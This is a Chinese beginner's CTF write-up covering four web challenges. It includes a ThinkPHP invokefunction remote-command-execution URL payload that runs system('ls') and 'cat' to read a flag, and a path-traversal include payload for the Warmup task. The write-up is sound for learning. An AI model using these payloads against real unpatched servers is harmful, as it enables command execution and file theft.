一、baby_web
点开题目链接得到
题目描述:想想初始页面是哪个
因为初始页面是index.php
所以想到将http://220.249.52.133:50436/1.php改成http://220.249.52.133:50436/index.php
但是改完之后访问不了所以用Brupsuite抓包试试看
将1.php改成index.php 点击发送,得到新的数据
flag is hidden!
在头部找到flag
二、Training-WWW-Robots
点击链接后得进入这个页面
关于robot协议在这位大佬的博客里有介绍
robot协议的相关知识
在网址后面加上/robots.txt得到页面
得到提示:不允许访问/f10g.php
(此地无银三百两,所以我们就访问/f10g.php)
把robots.txt改成/f10g.php
得到flag
三、php_rce
点开链接进入页面
上网百度发现有rce漏洞,看了别人的wp知道可以通过payload /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls列出当前目录
(刚接触不是很懂,只知道ls是列出所有目录的意思,是在学DOS命令的时候第一次看到的)
于是得到这个页面
通过尝试访问上级目录得到不同的提示,一直往上走
http://220.249.52.133:31007/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20…/…/…/…/…/
得到有关flag的提示
用cat命令读取
http://220.249.52.133:31007/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20…/…/…/flag
得到flag
————————————————————————————————
附加一道buuctf的web
Warmup
打开页面后得到一张滑稽的图片,想到在bugku的签到题,F12查看源代码
得到提示source.php,于是在网址后加上/source.php
有些函数看不懂,但是看到有hint.php想到去访问看看暗示了什么
flag写成了ffffllllaaaagggg,也许是一个提示,也许是多层目录下查找
查了不懂的函数稍微看得懂代码表达的意思
所以构造payload,得到/source.php?file=hint.php?../…/…/…/…/…/ffffllllaaaagggg
得到flag: flag{27587f7e-330a-4013-a2d1-d642f162b884}